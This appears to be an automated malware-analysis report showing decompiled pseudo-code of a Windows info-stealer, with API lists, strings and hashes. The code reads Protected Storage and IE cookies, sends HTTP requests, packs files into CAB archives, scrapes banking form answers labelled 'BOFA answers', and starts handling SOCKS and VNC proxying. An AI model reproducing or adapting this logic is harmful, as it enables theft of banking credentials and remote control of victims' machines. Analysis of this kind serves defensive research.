    											_v260 =  &(_v260[_v236]);
    											 *_v260 = 0x20;
    											_v260[1] = 0x3d;
    											_v260[2] = 0x20;
    											_v260 =  &(_v260[3]);
    											E0040F0FC(_v260, _v232, _t235);
    											 *((char*)(_t235 + _v272)) = 0xd;
    											 *((char*)(_t235 + _v272 + 1)) = 0xa;
    											_t230 = _t229 + 5;
    											__eflags = _t230;
    											 *((char*)(_t235 + _v272 + 2)) = 0;
    											_v252 = _t230;
    										}
    										E0040F0C0(_v232);
    										_t233 = _v244;
    										continue;
    									} else {
    										goto L29;
    									}
    									do {
    										L29:
    										_t178 =  *((intOrPtr*)(_t228 + _v260));
    										__eflags = _t178;
    										if(_t178 != 0) {
    											_t179 = _t178 & 0x000000ff;
    										} else {
    											_t179 = 0x7c;
    										}
    										 *(_t228 + _t221) = _t179;
    										_t228 = _t228 + 1;
    										_t235 = _t235 + 1;
    										__eflags = _t228 - _v244;
    									} while (_t228 < _v244);
    									goto L33;
    								}
    								__eflags =  *(_t161 - 2);
    								if( *(_t161 - 2) != 0) {
    									goto L28;
    								}
    								__eflags = _t200;
    								if(_t200 <= 0) {
    									goto L33;
    								} else {
    									goto L19;
    								}
    								do {
    									L19:
    									_t181 =  &(_v260[_t228]);
    									_t203 =  *_t181;
    									__eflags = _t203;
    									if(_t203 != 0) {
    										__eflags = _t181[0];
    										L23:
    										if(__eflags <= 0) {
    											 *(_t235 + _t221) = _t203;
    										} else {
    											WideCharToMultiByte(0, 0, _t181, 1, _t235 + _t221, 1, 0, 0);
    											_t221 = _v232;
    										}
    										goto L26;
    									}
    									__eflags = _t181[0];
    									if(__eflags != 0) {
    										goto L23;
    									}
    									 *(_t235 + _t221) = 0x7c;
    									L26:
    									_t228 = _t228 + 2;
    									_t235 = _t235 + 1;
    									__eflags = _t228 - _v244;
    								} while (_t228 < _v244);
    								goto L33;
    							}
    							_t183 = _v188;
    							 *((intOrPtr*)( *_t183 + 8))(_t183);
    						}
    						_t185 = _v144;
    						 *((intOrPtr*)( *_t185 + 8))(_t185);
    					}
    					_t187 = _v104;
    					 *((intOrPtr*)( *_t187 + 8))(_t187);
    					goto L44;
    				}
    			}

    0x00405219
    0x00405221
    0x00405223
    0x00405227
    0x0040522f
    0x00405237
    0x0040523b
    0x0040523f
    0x00405243
    0x00405249
    0x00405517
    0x00405522
    0x00405526
    0x00405531
    0x00405533
    0x00405539
    0x00405543
    0x0040554a
    0x0040554e
    0x00405568
    0x00405568
    0x00405571
    0x00405571
    0x00405539
    0x00405576
    0x0040557a
    0x0040557e
    0x00405580
    0x00405580
    0x0040558f
    0x0040559b
    0x004055a4
    0x004055ab
    0x004055b8
    0x004055b8
    0x0040524f
    0x00405250
    0x00405251
    0x00405252
    0x00405256
    0x0040525b
    0x00000000
    0x00000000
    0x00405261
    0x00405267
    0x00000000
    0x00000000
    0x0040526f
    0x00405273
    0x00405274
    0x00405275
    0x00405276
    0x0040527c
    0x0040550d
    0x0040550d
    0x00405511
    0x00405514
    0x00000000
    0x00405282
    0x004054e9
    0x004054e9
    0x004054ef
    0x004054f0
    0x004054f4
    0x004054f5
    0x004054f7
    0x004054fd
    0x00000000
    0x00000000
    0x00405287
    0x0040528f
    0x00000000
    0x00000000
    0x00405295
    0x004052a8
    0x004052ab
    0x004052ad
    0x00000000
    0x00000000
    0x004054c5
    0x004054c5
    0x004054d4
    0x004054d7
    0x004054d9
    0x00000000
    0x00000000
    0x004052b8
    0x004052d0
    0x004052d3
    0x004052d5
    0x00000000
    0x00000000
    0x004052db
    0x004052df
    0x004054a1
    0x004054a1
    0x004054b0
    0x004054b3
    0x004054b5
    0x00000000
    0x00000000
    0x004052f7
    0x004052f9
    0x004052fb
    0x00000000
    0x00000000
    0x00405301
    0x00405305
    0x00000000
    0x00000000
    0x0040530b
    0x0040530f
    0x00000000
    0x00000000
    0x00405315
    0x0040533c
    0x0040533f
    0x00405341
    0x00000000
    0x00000000
    0x00405347
    0x0040534b
    0x0040534e
    0x00000000
    0x00000000
    0x00405359
    0x0040535b
    0x0040535f
    0x00405361
    0x00000000
    0x00000000
    0x00405369
    0x0040536c
    0x00405374
    0x00405376
    0x00405378
    0x0040537a
    0x0040537d
    0x004053cb
    0x004053cb
    0x004053cd
    0x004053ed
    0x004053ed
    0x004053f2
    0x004053f4
    0x004053f4
    0x004053f4
    0x004053f9
    0x00405406
    0x0040540c
    0x0040540f
    0x00405412
    0x00405417
    0x0040541b
    0x0040541d
    0x00405425
    0x00405429
    0x00405432
    0x0040543c
    0x00405446
    0x0040544e
    0x00405455
    0x00405462
    0x00405466
    0x0040546f
    0x00405478
    0x00405480
    0x00405489
    0x00405489
    0x0040548c
    0x00405490
    0x00405490
    0x00405498
    0x0040549d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004053cf
    0x004053cf
    0x004053d3
    0x004053d6
    0x004053d8
    0x004053df
    0x004053da
    0x004053dc
    0x004053dc
    0x004053e2
    0x004053e5
    0x004053e6
    0x004053e7
    0x004053e7
    0x00000000
    0x004053cf
    0x0040537f
    0x00405382
    0x00000000
    0x00000000
    0x00405384
    0x00405386
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405388
    0x00405388
    0x0040538c
    0x0040538e
    0x00405390
    0x00405392
    0x0040539f
    0x004053a2
    0x004053a2
    0x004053bd
    0x004053a4
    0x004053b1
    0x004053b7
    0x004053b7
    0x00000000
    0x004053a2
    0x00405394
    0x00405397
    0x00000000
    0x00000000
    0x00405399
    0x004053c0
    0x004053c1
    0x004053c2
    0x004053c3
    0x004053c3
    0x00000000
    0x004053c9
    0x004054bb
    0x004054c2
    0x004054c2
    0x004054df
    0x004054e6
    0x004054e6
    0x00405503
    0x0040550a
    0x00000000
    0x0040550a

    APIs
    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00405212
    • GetProcAddress.KERNELBASE(00000000), ref: 00405219
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: IE Cookies:$:StringData$Empty$PStoreCreateInstance$Protected Storage:%S$Z%a$pstorec.dll
    • API String ID: 2574300362-834128494
    • Opcode ID: c7d10ab29ebc81ba8573217b75d0e70815db3f7ee8b5bae6ae4cebbb3cdbecfa
    • Instruction ID: 1e41f8bf5fa9401bcdaa6836c9241a5a4b994f9ff3dd797a9841cb132af8be6f
    • Opcode Fuzzy Hash: c7d10ab29ebc81ba8573217b75d0e70815db3f7ee8b5bae6ae4cebbb3cdbecfa
    • Instruction Fuzzy Hash: F3C18771208741AFD710DF64C884E6BBBE9EFC8308F04892EF485A7291D679D949CF66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0040E267(long _a4) {
    				void _v8;
    				void _v60;
    				void _v1084;
    				void* __ebx;
    				void* __edi;
    				char* _t62;
    				char* _t67;
    				int _t73;
    				intOrPtr _t78;
    				intOrPtr _t82;
    				void* _t101;
    				signed int _t103;
    				char* _t108;
    				void* _t109;
    				char* _t110;
    				char** _t113;
    
    				E00414B37();
    				_t113 = _a4;
    				_t113[3] = 0;
    				_t113[1][8] = InternetOpenA( *0x4176a0, 0, 0, 0, 0);
    				_t62 = _t113[1];
    				_t101 = _t62[8];
    				if(_t101 == 0) {
    					L19:
    					return _t62;
    				}
    				_t113[1][0xc] = InternetConnectA(_t101, _t113[2][0x10], _t113[2][0x18] & 0x0000ffff, 0, 0, 3, 0, 0);
    				_t62 = _t113[1];
    				if(_t62[0xc] == 0) {
    					goto L19;
    				}
    				_push(_t109);
    				_t110 = E0040C725(0,  *_t113, _t109, _t113[2][0x2c]);
    				_t67 = _t113[2];
    				if(_t67[0xc] != 4) {
    					_t103 = 0;
    				} else {
    					_t103 = 0x800000;
    				}
    				_t108 = _t110;
    				if(_t110 == 0) {
    					_t108 = _t67[0x2c];
    				}
    				_t113[1][0x10] = HttpOpenRequestA(_t113[1][0xc],  &(( *_t113)[0x404]), _t108, 0,  *_t113, 0, _t103 | 0x8004f200, 0);
    				E0040F0C0(_t110);
    				_t73 = _t113[1];
    				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
    					_a4 = 0x31;
    					if(HttpQueryInfoA(( *_t113)[0x430], 0x80000001,  &_v60,  &_a4, 0) == 0 || _a4 == 0) {
    						_t78 =  *0x416c34; // 0x25df5a8
    						_t30 = _t78 + 0x124; // 0x25dffb9
    						 *0x416eec( &_v60,  *_t30);
    					}
    					_t82 =  *0x416c34; // 0x25df5a8
    					_t33 = _t82 + 0x128; // 0x2563de1
    					wnsprintfA( &_v1084, 0x3ff,  *_t33,  &_v60,  *0x416df0);
    					HttpAddRequestHeadersA(_t113[1][0x10],  &_v1084, 0xffffffff, 0xa0000000);
    					InternetSetStatusCallback(_t113[1][0x10], E0040E21E);
    					_t73 = HttpSendRequestA(_t113[1][0x10], 0, 0, ( *_t113)[0x428], ( *_t113)[0x42c]);
    					if(_t73 != 0) {
    						_a4 = 4;
    						_v8 = 0;
    						_t73 = HttpQueryInfoA(_t113[1][0x10], 0x20000013,  &_v8,  &_a4, 0);
    						if(_t73 != 0 && _v8 == 0xc8) {
    							_a4 = 0x3ff;
    							_t73 = InternetQueryOptionA(_t113[1][0x10], 0x22,  &_v1084,  &_a4);
    							if(_t73 != 0 && _a4 > 5) {
    								_t73 = E0040D3EA( &_v1084, _a4);
    							}
    							_t113[3] = 1;
    						}
    					}
    				}
    				return _t73;
    			}

    0x0040e272
    0x0040e277
    0x0040e280
    0x0040e292
    0x0040e295
    0x0040e298
    0x0040e29d
    0x0040e455
    0x0040e455
    0x0040e455
    0x0040e2be
    0x0040e2c1
    0x0040e2c7
    0x00000000
    0x00000000
    0x0040e2d2
    0x0040e2db
    0x0040e2dd
    0x0040e2e4
    0x0040e2ed
    0x0040e2e6
    0x0040e2e6
    0x0040e2e6
    0x0040e2ef
    0x0040e2f3
    0x0040e2f5
    0x0040e2f5
    0x0040e31c
    0x0040e31f
    0x0040e324
    0x0040e32a
    0x0040e340
    0x0040e355
    0x0040e35c
    0x0040e361
    0x0040e36b
    0x0040e36b
    0x0040e37b
    0x0040e380
    0x0040e393
    0x0040e3b0
    0x0040e3c1
    0x0040e3dd
    0x0040e3e5
    0x0040e3f8
    0x0040e3ff
    0x0040e405
    0x0040e40d
    0x0040e428
    0x0040e42e
    0x0040e436
    0x0040e448
    0x0040e448
    0x0040e44d
    0x0040e44d
    0x0040e40d
    0x0040e3e5
    0x00000000

    APIs
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040E289
    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E2B5
      • Part of subcall function 0040C725: lstrcpy.KERNEL32(00000001,?), ref: 0040C7A8
    • HttpOpenRequestA.WININET(00000004,?,00000000,00000000,?,00000000,00000000,00000000), ref: 0040E312
    • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040E34D
    • lstrcpy.KERNEL32(?,025DFFB9), ref: 0040E36B
    • wnsprintfA.SHLWAPI ref: 0040E393
    • HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0040E3B0
    • InternetSetStatusCallback.WININET(?,Function_0000E21E), ref: 0040E3C1
    • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 0040E3DD
    • HttpQueryInfoA.WININET(?,20000013,?,00000031,00000000), ref: 0040E405
    • InternetQueryOptionA.WININET(?,00000022,?,00000004), ref: 0040E42E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Http$Internet$QueryRequest$InfoOpenlstrcpy$CallbackConnectHeadersOptionSendStatuswnsprintf
    • String ID: 1
    • API String ID: 1779409970-2212294583
    • Opcode ID: e3d6831a58ceabd51792ae80bf6da536e72aba9669ef170af2d0a26ecac9d059
    • Instruction ID: e0811e261b331205156510df7ad10474af5a29e52472d4cba52f40995be04c8e
    • Opcode Fuzzy Hash: e3d6831a58ceabd51792ae80bf6da536e72aba9669ef170af2d0a26ecac9d059
    • Instruction Fuzzy Hash: B75128B1600208AFDB20DF55CC84E9ABBF9FB08354B0184BAF659972A1D735ED50CF68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411A6B() {
    				struct HINSTANCE__* _t2;
    				_Unknown_base(*)()* _t7;
    				void* _t9;
    				intOrPtr _t11;
    				intOrPtr _t13;
    				intOrPtr _t14;
    				intOrPtr _t15;
    
    				_t11 =  *0x41807c; // 0x0
    				if(_t11 != 0) {
    					L9:
    					 *0x41807c =  *0x41807c + 1;
    					return 1;
    				} else {
    					_t2 = LoadLibraryA("cabinet.dll");
    					 *0x418078 = _t2;
    					if(_t2 == 0) {
    						L8:
    						return 0;
    					} else {
    						 *0x4176a4 = GetProcAddress(_t2, "FCICreate");
    						 *0x418068 = GetProcAddress( *0x418078, "FCIAddFile");
    						 *0x41706c = GetProcAddress( *0x418078, "FCIFlushCabinet");
    						_t7 = GetProcAddress( *0x418078, "FCIDestroy");
    						 *0x41806c = _t7;
    						_t13 =  *0x4176a4; // 0x0
    						if(_t13 == 0) {
    							L7:
    							FreeLibrary( *0x418078);
    							goto L8;
    						} else {
    							_t14 =  *0x418068; // 0x0
    							if(_t14 == 0) {
    								goto L7;
    							} else {
    								_t15 =  *0x41706c; // 0x0
    								if(_t15 == 0 || _t7 == 0) {
    									goto L7;
    								} else {
    									_t9 = HeapCreate(0, 0x80000, 0);
    									 *0x417068 = _t9;
    									if(_t9 != 0) {
    										goto L9;
    									} else {
    										goto L7;
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00000000,00411B5A,00000000,00411E2F,00405611,00000000,00000000,?,00415534,?,00405611,?), ref: 00411A7F
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00411A98
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 00411AAE
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00411AC4
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 00411ADA
    • HeapCreate.KERNEL32(00000000,00080000,00000000,?,00415534,?,00405611,?), ref: 00411B08
    • FreeLibrary.KERNEL32(?,00415534,?,00405611,?), ref: 00411B1D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: a1086923eb04050a66416021c89fe9b763a696cf6dbbafcac4b8d3948ad0bafb
    • Instruction ID: 9aa1ad1c7efff67d9ab0d23b22303702fcbabadc46934d03c35de23447c37219
    • Opcode Fuzzy Hash: a1086923eb04050a66416021c89fe9b763a696cf6dbbafcac4b8d3948ad0bafb
    • Instruction Fuzzy Hash: 5A1115B4A49724DBCB112F70BC489DA3F30A70DB12722C13AF245A2274DB785889CF9C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040C7C1(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				signed int _v9;
    				char _v16;
    				char* _v20;
    				char* _v24;
    				signed int _v28;
    				signed int _v32;
    				void* _v36;
    				char* _v40;
    				char _v1064;
    				void* _t127;
    				void* _t132;
    				void* _t133;
    				char _t134;
    				signed int _t144;
    				char _t145;
    				signed int _t157;
    				char _t158;
    				char* _t159;
    				char* _t163;
    				signed int _t168;
    				intOrPtr _t169;
    				char* _t170;
    				intOrPtr _t173;
    				int _t175;
    				signed int _t178;
    				void* _t180;
    				intOrPtr _t182;
    				intOrPtr _t183;
    				intOrPtr _t186;
    				intOrPtr _t187;
    				intOrPtr _t190;
    				intOrPtr _t191;
    				void* _t193;
    				intOrPtr _t194;
    				intOrPtr* _t196;
    				char* _t197;
    				char* _t198;
    				char _t199;
    				intOrPtr _t201;
    				intOrPtr _t203;
    				void* _t216;
    				void* _t219;
    				void* _t223;
    				void* _t224;
    				void* _t226;
    				char _t227;
    				char* _t228;
    				void* _t230;
    				intOrPtr* _t233;
    				void* _t234;
    				intOrPtr _t235;
    				intOrPtr* _t236;
    				char* _t237;
    				signed int _t238;
    				void* _t239;
    				void* _t240;
    
    				_t230 = __esi;
    				_t219 = __edi;
    				_t193 = __ebx;
    				 *0x416eec( &_v1064, _a4);
    				_t127 = E0040F521( &_v1064);
    				while(1) {
    					_t127 = _t127 - 1;
    					if(_t127 == 0) {
    						break;
    					}
    					if( *((char*)(_t239 + _t127 - 0x424)) != 0x2f) {
    						continue;
    					}
    					_t201 =  *0x416c34; // 0x25df5a8
    					_t6 = _t201 + 0x14c; // 0x2563e59
    					 *0x416eec(_t239 + _t127 - 0x423,  *_t6, _t219);
    					E00414B37();
    					_t132 = InternetOpenA( *0x4176a0, 0, 0, 0, 0);
    					if(_t132 == 0) {
    						L95:
    						break;
    					}
    					_t133 = InternetOpenUrlA(_t132,  &_v1064, 0, 0, 0x84043300, 0);
    					_t245 = _t133;
    					if(_t133 == 0) {
    						goto L95;
    					}
    					_push(_t230);
    					_t134 = E00406AC3( &_v1064,  &_v36, _t245, 0xffff, _t133);
    					_v8 = _t134;
    					if(_t134 == 0) {
    						L94:
    						goto L95;
    					}
    					_t233 = _v36;
    					_push(_t193);
    					_t194 = 0;
    					_t216 = 0;
    					_t223 = "*<select " - _t233;
    					do {
    						_t203 =  *((intOrPtr*)(_t223 + _t233));
    						if(_t203 - 0x41 <= 0x19) {
    							_t203 = _t203 + 0x20;
    						}
    						if(_t203 != 0x23) {
    							__eflags = _t203 - 0x2a;
    							if(_t203 == 0x2a) {
    								_t16 = _t216 + 1; // 0x1
    								__eflags = _t16 - 9;
    								if(__eflags != 0) {
    									__eflags = _t194 - _v8;
    									if(_t194 >= _v8) {
    										goto L93;
    									}
    									_t224 = 8;
    									_t225 = _t224 - _t216;
    									__eflags = _t224 - _t216;
    									_t20 = _t216 +  &M00404055; // 0x404055
    									_t234 = _t20;
    									while(1) {
    										_t144 = E0040AD1B(_t234, _t225, _v36 + _t194, _v8 - _t194,  &_v16, 0, 0);
    										__eflags = _t144;
    										if(_t144 != 0) {
    											break;
    										}
    										_t194 = _t194 + 1;
    										__eflags = _t194 - _v8;
    										if(_t194 < _v8) {
    											continue;
    										}
    										goto L93;
    									}
    									_t25 =  &_v16;
    									 *_t25 = _v16 + _t194;
    									__eflags =  *_t25;
    									L28:
    									_t145 = _v16;
    									_v28 = _v28 & 0x00000000;
    									_v32 = _v32 & 0x00000000;
    									_v8 = _v8 - _t145;
    									_t196 = _t145 + _v36;
    									_v9 = 0;
    									do {
    										_v20 = "*<option  selected";
    										_t235 = 0;
    										_t226 = 0;
    										_v20 = _v20 - _t196;
    										_t218 = _t196;
    										do {
    											_t206 = _v20[_t218];
    											if(_t206 - 0x41 <= 0x19) {
    												_t206 = _t206 + 0x20;
    											}
    											if(_t206 != 0x23) {
    												__eflags = _t206 - 0x2a;
    												if(_t206 == 0x2a) {
    													_t44 = _t226 + 1; // 0x1
    													__eflags = _t44 - 0x12;
    													if(__eflags != 0) {
    														__eflags = _t235 - _v8;
    														if(__eflags >= 0) {
    															goto L91;
    														}
    														_v20 = 0x11;
    														_t49 =  &_v20;
    														 *_t49 = _v20 - _t226;
    														__eflags =  *_t49;
    														_t51 = _t226 +  &M00404061; // 0x74706f3c
    														_t227 = _t51;
    														while(1) {
    															_t218 = _v20;
    															_t206 = _t227;
    															_t157 = E0040AD1B(_t227, _v20, _t235 + _t196, _v8 - _t235,  &_v16, 0, 0);
    															__eflags = _t157;
    															if(_t157 != 0) {
    																break;
    															}
    															_t235 = _t235 + 1;
    															__eflags = _t235 - _v8;
    															if(__eflags < 0) {
    																continue;
    															}
    															goto L91;
    														}
    														_t57 =  &_v16;
    														 *_t57 = _v16 + _t235;
    														__eflags =  *_t57;
    														L51:
    														_t158 = _v16;
    														_t197 = _t196 + _t158;
    														_t60 =  &_v8;
    														 *_t60 = _v8 - _t158;
    														if( *_t60 == 0) {
    															goto L91;
    														}
    														while( *_t197 != 0x3e) {
    															_t197 = _t197 + 1;
    															_t62 =  &_v8;
    															 *_t62 = _v8 - 1;
    															if( *_t62 != 0) {
    																continue;
    															}
    															break;
    														}
    														if(_v8 == 0) {
    															goto L91;
    														}
    														_t198 = _t197 + 1;
    														_t206 = _v8 + _t198;
    														_v40 = _t198;
    														_t159 = _t198;
    														if(_t198 >= _t206) {
    															L58:
    															if(_t159 == _t206) {
    																goto L91;
    															}
    															_t206 = _t159 - _t198;
    															if(_t159 - _t198 > 0x200) {
    																goto L91;
    															}
    															_v8 = _v8 + _t198 - _t159;
    															_t236 = _t159 + 1;
    															_t228 = 0;
    															_v24 = "*<input *value=\"";
    															_v24 = _v24 - _t236;
    															 *_t159 = 0;
    															_v20 = 0;
    															_t218 = _t236;
    															do {
    																_t206 = _v24[_t218];
    																if(_t206 - 0x41 <= 0x19) {
    																	_t206 = _t206 + 0x20;
    																}
    																if(_t206 != 0x23) {
    																	__eflags = _t206 - 0x2a;
    																	if(_t206 == 0x2a) {
    																		_t163 = _v20;
    																		_t82 = _t163 + 1; // 0x12
    																		_t206 = _t82;
    																		__eflags = _t82 - 0x10;
    																		if(__eflags != 0) {
    																			__eflags = _t228 - _v8;
    																			if(__eflags >= 0) {
    																				goto L91;
    																			}
    																			_v24 = 0xf;
    																			_t87 =  &_v24;
    																			 *_t87 = _v24 - _t163;
    																			__eflags =  *_t87;
    																			_t89 = _t163 +  &M00404075; // 0x404086
    																			_t199 = _t89;
    																			while(1) {
    																				_t218 = _v24;
    																				_t206 = _t199;
    																				_t168 = E0040AD1B(_t199, _v24, _t228 + _t236, _v8 - _t228,  &_v16, 0, 0);
    																				__eflags = _t168;
    																				if(_t168 != 0) {
    																					break;
    																				}
    																				_t228 = _t228 + 1;
    																				__eflags = _t228 - _v8;
    																				if(__eflags < 0) {
    																					continue;
    																				}
    																				goto L91;
    																			}
    																			_t95 =  &_v16;
    																			 *_t95 = _v16 + _t228;
    																			__eflags =  *_t95;
    																			_t196 = _v40;
    																			L82:
    																			_t169 = _v16;
    																			_v8 = _v8 - _t169;
    																			_t237 = _t236 + _t169;
    																			_t206 = _v8 + _t237;
    																			_t170 = _t237;
    																			if(_t237 >= _t206) {
    																				L85:
    																				if(_t170 == _t206) {
    																					goto L91;
    																				}
    																				_t206 = _t170 - _t237;
    																				if(_t170 - _t237 > 0x200) {
    																					goto L91;
    																				}
    																				 *_t170 = 0;
    																				_t173 =  *0x416c34; // 0x25df5a8
    																				_t103 = _t173 + 0x150; // 0x25633f9
    																				_t175 = wnsprintfA( &_v1064, 0x400,  *_t103, (_v9 & 0x000000ff) + 1, _t196, (_v9 & 0x000000ff) + 1, _t237);
    																				_t229 = _t175;
    																				_t240 = _t240 + 0x1c;
    																				_t238 = _t175 + _v32;
    																				_t178 = E0040F074(_t238 + 0xa, _v28);
    																				if(_t178 == 0) {
    																					E0040F0C0(_v28);
    																					_t118 =  &_v32;
    																					 *_t118 = _v32 & 0x00000000;
    																					__eflags =  *_t118;
    																					goto L91;
    																				}
    																				goto L88;
    																			}
    																			while( *_t170 != 0x22) {
    																				_t170 = _t170 + 1;
    																				if(_t170 < _t206) {
    																					continue;
    																				}
    																				goto L85;
    																			}
    																			goto L85;
    																		}
    																		_v16 = _v8;
    																		goto L82;
    																	}
    																	_t182 =  *_t218;
    																	__eflags = _t182 - 0x41;
    																	if(_t182 < 0x41) {
    																		L70:
    																		_t183 = _t182;
    																		L71:
    																		__eflags = _t206 - _t183;
    																		if(__eflags != 0) {
    																			goto L91;
    																		}
    																		goto L72;
    																	}
    																	__eflags = _t182 - 0x5a;
    																	if(_t182 > 0x5a) {
    																		goto L70;
    																	}
    																	_t183 = _t182 + 0x20;
    																	goto L71;
    																} else {
    																	if(_t228 == _v8) {
    																		goto L91;
    																	}
    																}
    																L72:
    																_t228 = _t228 + 1;
    																_t218 = _t218 + 1;
    																_v20 =  &(_v20[1]);
    															} while (_v20 != 0x10);
    															_v16 = _t228;
    															goto L82;
    														}
    														while( *_t159 != 0x3c) {
    															_t159 = _t159 + 1;
    															if(_t159 < _t206) {
    																continue;
    															}
    															goto L58;
    														}
    														goto L58;
    													}
    													_v16 = _v8;
    													goto L51;
    												}
    												_t186 =  *_t218;
    												__eflags = _t186 - 0x41;
    												if(_t186 < 0x41) {
    													L39:
    													_t187 = _t186;
    													L40:
    													__eflags = _t206 - _t187;
    													if(__eflags != 0) {
    														goto L91;
    													}
    													goto L41;
    												}
    												__eflags = _t186 - 0x5a;
    												if(_t186 > 0x5a) {
    													goto L39;
    												}
    												_t187 = _t186 + 0x20;
    												goto L40;
    											} else {
    												if(_t235 == _v8) {
    													L91:
    													_t282 = _v32;
    													if(_v32 != 0) {
    														E0041540F(_t206, _t218, _t282, 0xc9, 0, 0, L"BOFA answers:\n\n%S", _v28);
    														E0040F0C0(_v28);
    													}
    													goto L93;
    												}
    											}
    											L41:
    											_t235 = _t235 + 1;
    											_t218 = _t218 + 1;
    											_t226 = _t226 + 1;
    										} while (_t226 != 0x12);
    										_v16 = _t235;
    										goto L51;
    										L88:
    										_t206 = _v32 + _t178;
    										_v28 = _t178;
    										_t180 = E0040F0FC(_v32 + _t178,  &_v1064, _t229);
    										_v9 = _v9 + 1;
    										_v32 = _t238;
    										 *((char*)(_t180 + _t238)) = 0;
    									} while (_v9 < 3);
    									goto L91;
    								}
    								_v16 = _v8;
    								goto L28;
    							}
    							_t190 =  *_t233;
    							__eflags = _t190 - 0x41;
    							if(_t190 < 0x41) {
    								L16:
    								_t191 = _t190;
    								L17:
    								__eflags = _t203 - _t191;
    								if(__eflags != 0) {
    									goto L93;
    								}
    								goto L18;
    							}
    							__eflags = _t190 - 0x5a;
    							if(_t190 > 0x5a) {
    								goto L16;
    							}
    							_t191 = _t190 + 0x20;
    							goto L17;
    						} else {
    							if(_t194 == _v8) {
    								L93:
    								E0040F0C0(_v36);
    								goto L94;
    							}
    						}
    						L18:
    						_t194 = _t194 + 1;
    						_t233 = _t233 + 1;
    						_t216 = _t216 + 1;
    					} while (_t216 != 9);
    					_v16 = _t194;
    					goto L28;
    				}
    				return E0040F0C0(_a4);
    			}

    APIs
    • lstrcpy.KERNEL32(?,?), ref: 0040C7D4
    • lstrcpy.KERNEL32(?,02563E59), ref: 0040C80B
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040C822
    • InternetOpenUrlA.WININET(00000000,0000002F,00000000,00000000,84043300,00000000), ref: 0040C840
    • wnsprintfA.SHLWAPI ref: 0040CB65
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: InternetOpenlstrcpy$wnsprintf
    • String ID: *<input *value="$*<option selected$*<select $/$BOFA answers:%S$`@@
    • API String ID: 3861095738-265672519
    • Opcode ID: 59b48bf62179310d243c1a4f089ba194c66bb323e8cf5d73889e107ed525d16f
    • Instruction ID: 74fa19b8dbe9ab60e097668a530311678bf45966e15a7f352280a5b63dc06522
    • Opcode Fuzzy Hash: 59b48bf62179310d243c1a4f089ba194c66bb323e8cf5d73889e107ed525d16f
    • Instruction Fuzzy Hash: 0ED1AD71A00109EBDF20DBA8C8C5BEEB7B5EB45304F2442BBD551B7282C67C6A46CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E0040A25B(void* __esi, char _a4, char _a7, long _a8, char _a12) {
    				signed int _v8;
    				void* _v12;
    				signed int _v16;
    				char _v20;
    				short _v22;
    				char _v24;
    				signed char _v61;
    				signed int _v62;
    				char _v64;
    				void* __edi;
    				long _t45;
    				signed short _t47;
    				signed int _t49;
    				long _t52;
    				long _t53;
    				char _t56;
    				char _t58;
    				long _t59;
    				long _t60;
    				long _t65;
    				long _t68;
    				void* _t70;
    				long _t74;
    				long _t76;
    				void* _t78;
    				intOrPtr _t79;
    				long _t80;
    				char _t84;
    				void* _t86;
    				long _t88;
    				void* _t92;
    				intOrPtr* _t95;
    				void* _t96;
    				void* _t100;
    				long _t101;
    
    				_t96 = __esi;
    				_push("socks");
    				_push(_a4);
    				if( *0x416edc() != 0) {
    					_t45 =  *0x416edc(_a4, "rfb");
    					__eflags = _t45;
    					if(_t45 != 0) {
    						_t47 = E0040F2EB(_a4, _t86);
    						_t9 = _t47 - 1; // -1
    						__eflags = _t9 - 0xfffd;
    						if(_t9 > 0xfffd) {
    							L10:
    							return 0;
    						}
    						L8:
    						_t49 = _t47 & 0x0000ffff;
    						L9:
    						if(_t49 != 0) {
    							_v8 = _v8 & 0x00000000;
    							asm("rol ax, 0x8");
    							_v16 = _t49 & 0x0000ffff;
    							_t52 =  *0x416dc0(_a8, _a12, 0,  &_a8);
    							__eflags = _t52;
    							if(_t52 != 0) {
    								goto L10;
    							}
    							_t53 = _a8;
    							while(1) {
    								__eflags = _t53;
    								if(_t53 == 0) {
    									break;
    								}
    								__eflags =  *((intOrPtr*)(_t53 + 4)) - 2;
    								if(__eflags == 0) {
    									_t84 =  *((intOrPtr*)(_t53 + 0x10));
    									_v8 = E0040F113(__eflags,  *((intOrPtr*)(_t53 + 0x18)), _t84);
    									L17:
    									 *0x416dc4(_a8, _t92);
    									_t93 = _v8;
    									__eflags = _v8;
    									if(_v8 != 0) {
    										_a7 = 0;
    										_t56 = E004105BC(_t93, _t84);
    										_a12 = _t56;
    										__eflags = _t56 - 0xffffffff;
